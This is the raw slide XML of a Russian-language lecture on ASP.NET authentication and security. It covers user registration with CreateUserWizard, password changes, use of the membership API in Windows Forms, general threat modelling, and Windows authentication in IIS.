          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> Создайте страницу регистрации пользователей, например, с именем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>NewUser.aspx.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Добавьте к странице ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>CreateUserWizard. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Данный ЭУ будет запрашивать у пользователя имя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> (name), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>пароль</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> (password), e-mail, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>секретный вопрос и секретный правильный ответ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>ЭУ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> CreateUserWizard </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>включает проверку правильности задания пользователем пароля</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138244" name="Picture 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1692275" y="3243263"/>
            <a:ext cx="5327650" cy="3614737"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="ru-RU"/>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ru-RU" sz="3600" smtClean="0"/>
              <a:t>Диалог регистрации пользователя</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139267" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8229600" cy="914400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="139268" name="Picture 4" descr="The Login Web control in action."/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2609850"/>
            <a:ext cx="4419600" cy="4248150"/>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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140291" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Создайте обработчик нажатия кнопки </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>ContinueButtonClick. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Как минимум, нужно перенаправить пользователя на страницу, с содержанием доступным для зарегистрированных пользователей, как показано ниже</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>protected void CreateUserWizard1_ContinueButtonClick(object sender, EventArgs e)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>{ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>	Response.Redirect("Members/Default.aspx");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>По умолчанию, новый пользователь не принадлежит ни к какой роли</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>Для добавления нового пользователя к роли </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t>к такой, как обычные пользователи </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Users)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> необходимо добавить обработчик события </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>CreateUserWizard.CreatedUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="1800" smtClean="0"/>
              <a:t> и затем вызвать метод </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>Roles.AddUserToRole.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="1800" smtClean="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274638"/>
            <a:ext cx="8229600" cy="561975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" b="1" smtClean="0"/>
              <a:t>Создание страницы изменения пароля пользователя</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="3200" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141315" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1484313"/>
            <a:ext cx="8435975" cy="5113337"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> 	Создайте страницу управления учетными записями, например, с именем </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ManageUser.aspx.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Добавьте на нее ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ChangePassword</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Добавьте ЭУ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> ValidationSummary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>к вашей странице подключения и задайте свойству </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ValidationSummary.ValidationGroup </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>значение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>созданного ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ChangePassword. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Он детально описывает сообщение об ошибке при событии, когда пользователь забыл ввести пароль или возникла другая ошибка проверки</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Например, если пользователь забыл ввести данные в поле </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>Confirm New Password, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t> то ЭУ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> ChangePassword </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>показывает красные звездочки около этого поля</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Если добавить ЭУ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>ValidationSummary, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>то он будет показывать сообщение </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>“Confirm New Password is required”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Однако ошибка ввода неверных регистрационных данных показывается в самом ЭУ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> Login, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>а не в ЭУ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> ValidationSummary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="609600" indent="-609600" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>4.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>  Создать обработчик для события</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t> ContinueButtonClick. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>По краней мере, нужно перенаправить пользователя на страницу с содержанием пользователя</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="2000" smtClean="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ru-RU" sz="3200" smtClean="0"/>
              <a:t>Использование Membership в </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU" sz="3200" smtClean="0"/>
              <a:t>Windows Forms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="142339" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8507413" cy="4997450"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Хотя membership API было начально создано для ASP.NET и web приложений, его можно также использовать для приложений, основанных на Windows Forms.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Microsoft patterns &amp; practices группа создает последнюю версию Microsoft Enterprise Library (version 3.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" i="1" smtClean="0"/>
              <a:t>x)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t> для for the .NET Framework с блоком аутентификации и авторизации. </a:t>
            </a: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endParaRPr lang="ru-RU" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143363" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Для того, чтобы использовать membership </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>в Windows Forms приложениях, необходимо выполнить следующие шаги:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Добавить ссылку на System.Web.dll.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Создать БД с помощью aspnet_regsql.exe.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Добавить конфигурационный файл приложения app.config.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Добавить connection string в app.config файл, которая указывает на membership ДБ.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Добавить секцию &lt;system.web&gt; в файл app.config.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Сконфигурировать раздел &lt;membership&gt; секции &lt;system.web&gt; в конфигурационном файле app.config.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Запустить приложение и работать с базой данных с помощью классов membership API.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="381000" indent="-381000" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2000"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77875"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" smtClean="0"/>
              <a:t>Оценка потенциальных угроз</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15363" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250825" y="1341438"/>
            <a:ext cx="8713788" cy="5256212"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>С самого начала разработки необходимо понимать среду работы </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>приложения:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>кто имеет доступ к приложению (является пользователем), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>где могут быть возможные точки атак</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>потенциально возможные угрозы от точек атак</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2400" smtClean="0"/>
              <a:t>Важным является моделирование угроз – структурированный способ анализа среды приложения к возможным угрозам, ранжирование угроз, принятие решений по используемым методам преодоления этих угроз.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Возможные угрозы, ранжирование этих угроз и затем принятие решений о том, как они могут быть уменьшены. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>На основе оценки угроз принятие решений по использованию технологий безопасности (таких как аутентификация или SSL шифрование)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Принятие организационных решений по поддержке этих технологий (информирование и обучение пользователей).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ru-RU" sz="2400" smtClean="0"/>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274638"/>
            <a:ext cx="8229600" cy="850900"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="4000" smtClean="0"/>
              <a:t>Способы Windows Authentication</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="144387" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000" smtClean="0"/>
              <a:t>Когда выбрана Windows аутентификация, то IIS использует одну из трех возможных стратегий для аутентификации каждого получаемого запроса:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
